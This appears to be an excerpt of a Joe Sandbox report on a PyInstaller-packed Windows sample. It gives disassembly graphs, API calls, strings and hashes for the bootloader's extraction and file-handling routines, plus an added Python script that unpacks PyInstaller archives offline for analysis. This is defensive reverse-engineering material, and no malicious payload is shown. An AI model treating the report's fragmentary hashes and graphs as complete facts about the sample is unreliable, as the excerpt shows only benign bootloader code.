                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 0-3907804496
                                                                                                                      • Opcode ID: aea0334473c4d0b6b232e3e03ae3b2abd8ea6ab403e7d246086e65437f25ec74
                                                                                                                      • Instruction ID: a7a0e8eb29fb076b53c19a031dd8d6fd14bd5957a19ae675367737c91044f0fd
                                                                                                                      • Opcode Fuzzy Hash: aea0334473c4d0b6b232e3e03ae3b2abd8ea6ab403e7d246086e65437f25ec74
                                                                                                                      • Instruction Fuzzy Hash: B2C11575E04249AFCF15EFA8CC80BBDBBB0AF4A310F144159E9159B292C734AE41EB21

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 168 f6e4d6-f6e506 call f6e2b2 171 f6e521-f6e52d call f60904 168->171 172 f6e508-f6e513 call f5e606 168->172 178 f6e546-f6e58f call f6e21d 171->178 179 f6e52f-f6e544 call f5e606 call f5e619 171->179 177 f6e515-f6e51c call f5e619 172->177 188 f6e7fb-f6e7ff 177->188 186 f6e591-f6e59a 178->186 187 f6e5fc-f6e605 GetFileType 178->187 179->177 190 f6e5d1-f6e5f7 GetLastError call f5e5e3 186->190 191 f6e59c-f6e5a0 186->191 192 f6e607-f6e638 GetLastError call f5e5e3 CloseHandle 187->192 193 f6e64e-f6e651 187->193 190->177 191->190 197 f6e5a2-f6e5cf call f6e21d 191->197 192->177 207 f6e63e-f6e649 call f5e619 192->207 195 f6e653-f6e658 193->195 196 f6e65a-f6e660 193->196 200 f6e664-f6e6b2 call f6084f 195->200 196->200 201 f6e662 196->201 197->187 197->190 211 f6e6b4-f6e6c0 call f6e42c 200->211 212 f6e6d1-f6e6f9 call f6dfca 200->212 201->200 207->177 211->212 219 f6e6c2 211->219 217 f6e6fe-f6e73f 212->217 218 f6e6fb-f6e6fc 212->218 221 f6e760-f6e76e 217->221 222 f6e741-f6e745 217->222 220 f6e6c4-f6e6cc call f63cca 218->220 219->220 220->188 224 f6e774-f6e778 221->224 225 f6e7f9 221->225 222->221 223 f6e747-f6e75b 222->223 223->221 224->225 227 f6e77a-f6e7ad CloseHandle call f6e21d 224->227 225->188 231 f6e7e1-f6e7f5 227->231 232 f6e7af-f6e7db GetLastError call f5e5e3 call f60a17 227->232 231->225 232->231
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00F6E21D: CreateFileW.KERNELBASE(00000000,00000000,?,00F6E57F,?,?,00000000,?,00F6E57F,00000000,0000000C), ref: 00F6E23A
                                                                                                                      • GetLastError.KERNEL32 ref: 00F6E5EA
                                                                                                                      • __dosmaperr.LIBCMT ref: 00F6E5F1
                                                                                                                      • GetFileType.KERNELBASE(00000000), ref: 00F6E5FD
                                                                                                                      • GetLastError.KERNEL32 ref: 00F6E607
                                                                                                                      • __dosmaperr.LIBCMT ref: 00F6E610
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00F6E630
                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00F6E77D
                                                                                                                      • GetLastError.KERNEL32 ref: 00F6E7AF
                                                                                                                      • __dosmaperr.LIBCMT ref: 00F6E7B6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                      • String ID: H
                                                                                                                      • API String ID: 4237864984-2852464175
                                                                                                                      • Opcode ID: 431752f102ec7e2622de3b71c8dc9f2c8d2e66beb5f2d40c5df46ba4aa6496fc
                                                                                                                      • Instruction ID: a4914d0f7dfa9b9710d8b369e1f4e1515fb203e412ab33096a17686aa72cbc8c
                                                                                                                      • Opcode Fuzzy Hash: 431752f102ec7e2622de3b71c8dc9f2c8d2e66beb5f2d40c5df46ba4aa6496fc
                                                                                                                      • Instruction Fuzzy Hash: 69A14637A101189FCF19DF68DC51BEE3BA1AB06324F28015DE812EF292DB358D16EB51

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 338 f512a0-f512ab 339 f512e1-f51300 call f5bd15 338->339 340 f512ad-f512c5 call f535c0 338->340 346 f51302-f5131d call f521e0 339->346 347 f5131e-f51333 call f5e380 339->347 340->339 345 f512c7-f512e0 call f52340 340->345 354 f51335-f5134e call f521e0 347->354 355 f51350-f51354 347->355 363 f513cb-f513d0 354->363 356 f51374-f51381 355->356 357 f51356-f5135b call f51040 355->357 360 f513c7 356->360 361 f51383-f51385 356->361 364 f51360-f51365 357->364 360->363 365 f51387 361->365 366 f51398 361->366 368 f513e2-f513e9 363->368 369 f513d2-f513d3 call f5b65c 363->369 364->363 367 f51367-f51372 call f5e365 364->367 370 f51391-f51396 365->370 371 f51389-f5138f 365->371 372 f5139a-f513ac call f5b91e 366->372 367->363 377 f513d8-f513db 369->377 370->372 371->366 371->370 379 f513ae-f513bf 372->379 380 f513ea-f51413 call f521e0 call f5e365 372->380 377->368 379->370 381 f513c1 379->381 380->363 381->360 383 f513c3-f513c5 381->383 383->360 383->361
                                                                                                                      Strings
                                                                                                                      • Failed to extract %s: failed to open archive file!, xrefs: 00F512CF
                                                                                                                      • fseek, xrefs: 00F5130B
                                                                                                                      • fread, xrefs: 00F513F7
                                                                                                                      • Failed to extract %s: failed to read data chunk!, xrefs: 00F513F2
                                                                                                                      • malloc, xrefs: 00F51341
                                                                                                                      • Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00F5133C
                                                                                                                      • Failed to extract %s: failed to seek to the entry's data!, xrefs: 00F51306
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                      • API String ID: 0-3659356012
                                                                                                                      • Opcode ID: e105c710dacc578b9eab87afd29fb1470a40d89bbb1de6cb1f786e4433316a98
                                                                                                                      • Instruction ID: df981358432b7b6d3fcdab9b1473859f20f81adb5b91decf0455604aad4387c6
                                                                                                                      • Opcode Fuzzy Hash: e105c710dacc578b9eab87afd29fb1470a40d89bbb1de6cb1f786e4433316a98
                                                                                                                      • Instruction Fuzzy Hash: 5A412B72E003116BEB14AF648C91B2B7798FF40766F048565FE049B642E775FA0CB293

Control-flow Graph: function at f52f30 (basic blocks f52f30-f53393). The rendered graph with its Executed/Not Executed colouring is omitted; the only Windows API call on the graph is SetDllDirectoryW at f531c1, all other callees are internal functions.
APIs
• Part of subcall function 00F534A0: GetModuleFileNameW.KERNEL32(00000000,?,00001000,?,00F52F89,?,?), ref: 00F534CC
• SetDllDirectoryW.KERNEL32(?), ref: 00F531C1
• Part of subcall function 00F55C60: GetEnvironmentVariableW.KERNEL32(00000000,?,00002000,?,00F52FD8,_MEIPASS2), ref: 00F55C96
• Part of subcall function 00F55C60: ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,00002000,?,00F52FD8,_MEIPASS2), ref: 00F55CB2
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
• String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
• API String ID: 2344891160-3602715111
• Opcode ID: 734a7e3a4ae3d4b4580960101363d7ce885150d757c2e64e8ff0aa277c0216fd
• Instruction ID: ed3398947a25329c485e641722581280a5255d89ddfcac71a0405a9ef43fc0bf
• Opcode Fuzzy Hash: 734a7e3a4ae3d4b4580960101363d7ce885150d757c2e64e8ff0aa277c0216fd
• Instruction Fuzzy Hash: 0EB13B72D087416BC711AA749C42BAF77DCAF5475AF040529FF8882142E769E70CB7A3

Control-flow Graph: function at f51040 (basic blocks f51040-f51265). The rendered graph is omitted; no Windows API call appears on it, every callee is an internal function.
Strings
• 1.2.11, xrefs: 00F5104D
• Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00F510B1
• Failed to extract %s: decompression resulted in return code %d!, xrefs: 00F511DE
• malloc, xrefs: 00F510B6, 00F510E8
• Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00F510E3
• Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00F5107E
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID:
• String ID: 1.2.11$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
• API String ID: 0-1060636955
• Opcode ID: b83f119209401e4dc65f829dccba4ae24f1bec04eb59fdc36accf4d6ceb2c2c0
• Instruction ID: 7f51e05d369b6216dd8425dd802cdf752b2134067000c3176bb48a8794fd94db
• Opcode Fuzzy Hash: b83f119209401e4dc65f829dccba4ae24f1bec04eb59fdc36accf4d6ceb2c2c0
• Instruction Fuzzy Hash: 1B51F771D043005BD3109F689C82B5BBBE8BF45762F04096DFF48D6282E765EA0CA793
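The three functions above (the fread/fseek/malloc extractor, the _MEIPASS2/"Cannot open PyInstaller archive" locator, and the zlib 1.2.11 inflateInit() routine) are the PyInstaller bootloader reading the CArchive appended to the executable. The script below is an added example, not code from this report, from Joe Sandbox or from PyInstaller: it does offline what the bootloader does at run time, so an analyst can pull the bundled Python files out of a sample like this one without executing it. It assumes the cookie and TOC layouts of PyInstaller 2.1 and later (cookie format "!8sIIii64s", TOC entry header "!iiiiBc" followed by a NUL-padded name), and the archive it parses is constructed inside the script; the entry names and a fake "MZ" prefix standing in for the bootloader PE are constructed test data, not taken from the sample.

```python
import struct
import zlib

# Cookie layout of PyInstaller >= 2.1 (bootloader pyi_archive.h): magic,
# package length, TOC offset, TOC length, Python version, Python DLL name.
COOKIE_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE_FMT = "!8sIIii64s"
COOKIE_SIZE = struct.calcsize(COOKIE_FMT)        # 88 bytes
# TOC entry header: entry length, data offset, compressed size, uncompressed
# size, compression flag, type code; the NUL-padded entry name follows it.
TOC_ENTRY_FMT = "!iiiiBc"
TOC_ENTRY_HDR = struct.calcsize(TOC_ENTRY_FMT)   # 18 bytes


def has_pyinstaller_cookie(blob):
    """Cheap triage check: does the file carry a PyInstaller cookie at all?"""
    return blob.rfind(COOKIE_MAGIC) >= 0


def parse_carchive(blob):
    """Locate the CArchive cookie in ``blob`` and return (python_version, entries).

    Each entry is a dict with the TOC name, the one-character type code and the
    inflated data. The checks mirror the bootloader's own failure messages
    ("failed to seek to the entry's data", "failed to read data chunk",
    "decompression resulted in return code").
    """
    cookie_pos = blob.rfind(COOKIE_MAGIC)   # rfind: the cookie sits at the tail
    if cookie_pos < 0:
        raise ValueError("no PyInstaller cookie found")
    if cookie_pos + COOKIE_SIZE > len(blob):
        raise ValueError("truncated cookie")
    _, pkg_len, toc_off, toc_len, pyver, _pylib = struct.unpack_from(COOKIE_FMT, blob, cookie_pos)
    # The package (entry data + TOC + cookie) ends with the cookie; whatever
    # precedes it (the bootloader PE) is not addressed by TOC offsets.
    pkg_start = cookie_pos + COOKIE_SIZE - pkg_len
    if pkg_start < 0 or toc_off + toc_len > pkg_len:
        raise ValueError("cookie describes a package larger than the file")
    toc = blob[pkg_start + toc_off:pkg_start + toc_off + toc_len]
    entries = []
    pos = 0
    while pos < len(toc):
        if pos + TOC_ENTRY_HDR > len(toc):
            raise ValueError("truncated TOC entry at %d" % pos)
        entry_len, off, csize, usize, flag, typecode = struct.unpack_from(TOC_ENTRY_FMT, toc, pos)
        if entry_len < TOC_ENTRY_HDR or pos + entry_len > len(toc):
            raise ValueError("malformed TOC entry at %d" % pos)
        name = toc[pos + TOC_ENTRY_HDR:pos + entry_len].rstrip(b"\x00").decode("utf-8")
        raw = blob[pkg_start + off:pkg_start + off + csize]
        if len(raw) != csize:
            raise ValueError("short read for %s" % name)
        data = zlib.decompress(raw) if flag else raw
        if len(data) != usize:
            raise ValueError("size mismatch for %s" % name)
        entries.append({"name": name, "type": typecode.decode("ascii"), "data": data})
        pos += entry_len
    return pyver, entries


def build_carchive(items, pyver=311, pylib=b"python311.dll"):
    """Build a CArchive from (name, typecode, data, compress) tuples.

    Constructed test data only: it follows the writer layout so the parser
    above can be exercised without a real sample.
    """
    body = bytearray()
    toc = bytearray()
    for name, typecode, data, compress in items:
        raw = zlib.compress(data) if compress else data
        name_bytes = name.encode("utf-8") + b"\x00"
        entry_len = TOC_ENTRY_HDR + len(name_bytes)
        entry_len += (-entry_len) % 16   # pad to 16 bytes; the parser relies only on entry_len
        toc += struct.pack(TOC_ENTRY_FMT, entry_len, len(body), len(raw), len(data),
                           int(compress), typecode.encode("ascii"))
        toc += name_bytes.ljust(entry_len - TOC_ENTRY_HDR, b"\x00")
        body += raw
    toc_off = len(body)
    pkg_len = toc_off + len(toc) + COOKIE_SIZE
    cookie = struct.pack(COOKIE_FMT, COOKIE_MAGIC, pkg_len, toc_off, len(toc), pyver, pylib)
    return bytes(body + toc + cookie)


# Constructed entries; names and contents are invented for the demonstration.
SAMPLE_ITEMS = [
    ("pyiboot01_bootstrap", "s", b"import sys\nsys.frozen = True\n", True),
    ("stub", "s", b"print('hello from the bundle')\n", True),
    ("PYZ-00.pyz", "z", b"PYZ\x00" + bytes(range(32)), False),
]


def demo_parse():
    """Prepend a stand-in for the bootloader PE (constructed) and parse the archive."""
    blob = b"MZ" + b"\x00" * 510 + build_carchive(SAMPLE_ITEMS)
    pyver, entries = parse_carchive(blob)
    return pyver, {e["name"]: (e["type"], e["data"]) for e in entries}


if __name__ == "__main__":
    version, found = demo_parse()
    print("python version field:", version)
    for name, (typecode, data) in found.items():
        print("%-22s type=%s %d bytes" % (name, typecode, len(data)))
```

On a real onefile sample the "s" entries are the bootstrap and entry-point scripts and the "z" entry is the PYZ with the compiled modules; the package length in the cookie is what the bootloader's fseek/fread path trusts, so a cookie whose package length exceeds the file is the same condition that produces the "failed to seek" / "failed to read data chunk" messages listed above.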

Control-flow Graph: function at f670e9 (basic blocks f670e9-f671ae). The rendered graph is omitted; Windows API calls on it are LoadLibraryExW (two call sites, f67118 and f67166), GetLastError (f67133) and FreeLibrary (f6718e).
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID:
• String ID: api-ms-$ext-ms-
• API String ID: 0-537541572
• Opcode ID: a0932203a1c304cb69444c85e3e16df8b7be7887f7c26664a1fdd71369748fb6
• Instruction ID: 378f146946c2a4c7c8d676ad1a4221bf3766984b1555ba7ffe014a561a214a2b
• Opcode Fuzzy Hash: a0932203a1c304cb69444c85e3e16df8b7be7887f7c26664a1fdd71369748fb6
• Instruction Fuzzy Hash: E1210A32E09325BBDB22AB349C44B5A77599F437BCF250523ED09A7292D630DE01F6E1

Control-flow Graph: function at f63cca (basic blocks f63cca-f63d65). The rendered graph is omitted; Windows API calls on it are CloseHandle (f63d18) and GetLastError (f63d2a).
APIs
• CloseHandle.KERNELBASE(00000000,00000000,?,?,00F63BF8,?,00F7F038,0000000C,00F63CAA,?,?,?), ref: 00F63D20
• GetLastError.KERNEL32(?,00F63BF8,?,00F7F038,0000000C,00F63CAA,?,?,?), ref: 00F63D2A
• __dosmaperr.LIBCMT ref: 00F63D55
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: CloseErrorHandleLast__dosmaperr
• String ID:
• API String ID: 2583163307-0
• Opcode ID: cbeec3b724bd6bc1322411d6eb8fdfbf1c073c406e7141d9b3868d8ea3b7b297
• Instruction ID: 1675435a84074543a518818187f7684e68433e5bb0626e246cdd708320fd5a51
• Opcode Fuzzy Hash: cbeec3b724bd6bc1322411d6eb8fdfbf1c073c406e7141d9b3868d8ea3b7b297
• Instruction Fuzzy Hash: CD018E33F0026C1BC2205374DC06B7E77884F82774F38025DF818971C2DE698E817290

Control-flow Graph: function at f64b46 (basic blocks f64b46-f64bc1). The rendered graph is omitted; Windows API calls on it are SetFilePointerEx (f64b71) and GetLastError (f64b89).
APIs
• SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,00000000,00000000,?,00000000,00000000,00000000,?,00F64BF3,00000000,00000000,00000002,00000000), ref: 00F64B7F
• GetLastError.KERNEL32(?,00F64BF3,00000000,00000000,00000002,00000000,?,00F656E7,00000000,00000000,00000000,00000002,00000000,00000000,00000000,?), ref: 00F64B89
• __dosmaperr.LIBCMT ref: 00F64B90
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: ErrorFileLastPointer__dosmaperr
• String ID:
• API String ID: 2336955059-0
• Opcode ID: bb3a9f583bf9ebc3ca19c95d4aa6e6f5b1be245641caa32a89aacbf4ed7b3c77
• Instruction ID: ad79fd64dd8721ce693d9f515998a546d84c12524825a32f6cd3a6de087449d8
• Opcode Fuzzy Hash: bb3a9f583bf9ebc3ca19c95d4aa6e6f5b1be245641caa32a89aacbf4ed7b3c77
• Instruction Fuzzy Hash: DA01D833610518BBCB059B99DC45DAE3B29DBC5330B340248F952971D1EA74EE41B750

Control-flow Graph: function at f5e7ed (basic blocks f5e7ed-f5e8ca). The rendered graph is omitted; Windows API calls on it are CreateFileW (f5e85a) and CloseHandle (f5e8bd).
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 743a8a1489fe49b5f73c151042bfa6c5f9fdb502205f960bb9f56359e76b3a77
• Instruction ID: d83dc877b67e1c5f115108f63999c206d2d7de3ed9e3405fb0ce5b1450cdb9ff
• Opcode Fuzzy Hash: 743a8a1489fe49b5f73c151042bfa6c5f9fdb502205f960bb9f56359e76b3a77
• Instruction Fuzzy Hash: A8210A32D00218BBEB156B689C46B9F37689F4237BF110361FE282B1D1D7745F0AB661

Control-flow Graph

Basic blocks (node id, address range, calls):
• 740 f615d8-f615e4
• 741 f615e6-f615fc call f5e619 call f63b33
• 742 f615fd-f61612 call f62f81
• 748 f61617-f6161d call f64bc2
• 749 f61614
• 752 f61622-f61631
• 753 f61633
• 754 f61641-f6164a
• 755 f61660-f61693
• 756 f6164c-f6165b
• 757 f61703-f61708
• 758 f61639-f6163b
• 759 f61757-f6175b
• 760 f61695-f6169f
• 761 f616ea-f616f6
• 762 f616c3-f616cf
• 763 f616a1-f616ad
• 764 f6170a
• 765 f616f8-f616fd call f5e619
• 766 f6170d-f61717
• 767 f616af-f616be call f61915
• 768 f616d1-f616e8 call f61aab
• 770 f6171d-f61723
• 771 f61719-f6171b
• 775 f61755
• 776 f61736-f6173a
• 777 f61725-f61734 call f6175c
• 781 f61751-f61753
• 782 f6173c-f6174f call f71e60
Edges (source -> targets):
• 740 -> 741, 742
• 742 -> 748, 749
• 748 -> 752
• 749 -> 748
• 752 -> 753, 754
• 753 -> 757, 758
• 754 -> 755, 756
• 755 -> 760, 761
• 756 -> 759
• 757 -> 759
• 758 -> 754, 757
• 760 -> 762, 763
• 761 -> 764, 765
• 762 -> 764, 768
• 763 -> 762, 767
• 764 -> 766
• 765 -> 757
• 766 -> 770, 771
• 767 -> 759
• 768 -> 766
• 770 -> 776, 777
• 771 -> 775
• 775 -> 759
• 776 -> 781, 782
• 777 -> 759
• 781 -> 775
• 782 -> 781
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9f6b945254909cfc76e1310d7d940492520b8a62310ebc3fcd86163cea8f9bd5
• Instruction ID: 66cdf32264a3599041b57c3d7030ed707ed2f402daca8f1a3faeac4a5d9ac512
• Opcode Fuzzy Hash: 9f6b945254909cfc76e1310d7d940492520b8a62310ebc3fcd86163cea8f9bd5
• Instruction Fuzzy Hash: 2B410375E00208AFDB14DF58CC81AA97BB2FB89364F2C8168F8499B351D771DE42EB50
APIs
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID: __fread_nolock
• String ID:
• API String ID: 2638373210-0
• Opcode ID: 5acec9a429ba90609930334b44af4e936b8faf020c2940179ccbef0e36a064b9
• Instruction ID: f97fec9e9f030ba093166362ebcd9374224453f0d446ef39276d318ccc1e00ff
• Opcode Fuzzy Hash: 5acec9a429ba90609930334b44af4e936b8faf020c2940179ccbef0e36a064b9
• Instruction Fuzzy Hash: D0410972E0470157D7208A288C4171BBB92AF9533AFA94724FEB4D33C5EB25EC8D5292
Memory Dump Source
• Source File: 00000002.00000002.1547556693.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
• Associated: 00000002.00000002.1547519181.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547603566.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F83000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547633141.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1547723933.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_f50000_ceFgl3jkkk.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
